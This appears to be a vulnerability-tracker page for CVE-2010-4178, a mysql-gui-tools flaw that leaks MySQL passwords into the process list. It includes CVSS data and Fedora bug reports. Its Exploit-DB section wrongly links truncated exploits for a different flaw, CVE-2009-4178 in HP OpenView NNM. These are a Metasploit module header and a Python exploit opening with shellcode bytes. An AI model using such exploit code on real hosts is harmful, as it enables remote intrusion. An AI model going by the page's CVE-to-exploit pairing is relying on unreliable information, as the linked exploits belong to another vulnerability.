CVE-2010-4178
published 2019-11-06CVE-2010-4178: MySQL-GUI-tools (mysql-administrator) leaks passwords into process list after with launch of mysql text console
PriorityP421medium5.5CVSS 3.1
AVLACLPRLUINSUCHINAN
EPSS
0.40%
32.9th percentile
MySQL-GUI-tools (mysql-administrator) leaks passwords into process list after with launch of mysql text console
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fedoraproject | fedora | — | — |
| mysql-gui-tools | mysql-gui-tools | — | — |
CVSS provenance
nvdv3.15.5MEDIUMCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
nvdv2.02.1LOWAV:L/AC:L/Au:N/C:P/I:N/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Buffer Overflow (Metasploit)
exploitdb·2010-11-11
CVE-2009-4178 HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Buffer Overflow (Metasploit)
---
##
# $Id: hp_nnm_ovwebhelp.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute
arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICEN
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow
exploitdb·2010-03-30
CVE-2009-4178 HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow
HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow
---
#!/usr/bin/python
# Exploit title: HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Date: 2010.03.30
# Software link: hp.com
# Version: 7.53
# Tested on: Windows 2003 SP2
# CVE: 2009-4178
# Code:
############################################
# Trying 172.16.29.130...
# Connected to 172.16.29.130.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
############################################
import struct
import socket
import httplib
import urllib
#[*] x86/alpha_mixed succeeded with size 746 (iteration=1)
sc =(
"\x89\xe3\xd9\xc3\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x4
Bugzilla
CVE-2010-4178 mysql-gui-tools (mysql-administrator): Clear text password in the process list after user's launch of mysql text console
bugzilla·2010-11-19·CVSS 5.5
CVE-2010-4178 [MEDIUM] CVE-2010-4178 mysql-gui-tools (mysql-administrator): Clear text password in the process list after user's launch of mysql text console
CVE-2010-4178 mysql-gui-tools (mysql-administrator): Clear text password in the process list after user's launch of mysql text console
Martin Drescher pointed out a deficiency in the way
mysql-administrator launched MySQL Text Console
after user's MySQL connection to the MySQL server.
A local attacker could use this flaw to view the
password of the user, connected to the MySQL server,
in the clear text form via the list of running processes.
References:
[1] http://www.openwall.com/lists/oss-security/2010/11/16/6
[2] http://www.openwall.com/lists/oss-security/2010/11/18/2
Discussion:
This issue affects the version of the mysql-gui-tools package,
as shipped with Fedora release of 12.
Please fix.
---
Created mysql-gui-tools tracking bugs for this issue
Affects: fedora-12 [bug 655018]
Bugzilla
CVE-2010-4177 CVE-2010-4178 mysql-gui-tools various flaws [fedora-12]
bugzilla·2010-11-19·CVSS 5.5
CVE-2010-4177 [MEDIUM] CVE-2010-4177 CVE-2010-4178 mysql-gui-tools various flaws [fedora-12]
CVE-2010-4177 CVE-2010-4178 mysql-gui-tools various flaws [fedora-12]
fedora-12 tracking bug for mysql-gui-tools: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes
in the 'blocks' bugs.
[bug automatically created by: add-tracking-bugs]
Discussion:
Adding parent bug CVE-2010-4178
New bodhi update url:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=655015,655012
---
musql-gui-tools is dead package. It is not supported upstream many times and it is not Fedora start from 13. I do not want even see on it. Fedora 12 in few days reached EOL. So, I suggest close it.
---
Fedora 12 changed to end-of-life (EOL) status on 2010-12-02. Fedora 12 is
no longer maintained, which means that it
http://www.securityfocus.com/bid/97960https://access.redhat.com/security/cve/cve-2010-4178https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4178https://security-tracker.debian.org/tracker/CVE-2010-4178http://www.securityfocus.com/bid/97960https://access.redhat.com/security/cve/cve-2010-4178https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4178https://security-tracker.debian.org/tracker/CVE-2010-4178
2019-11-06
Published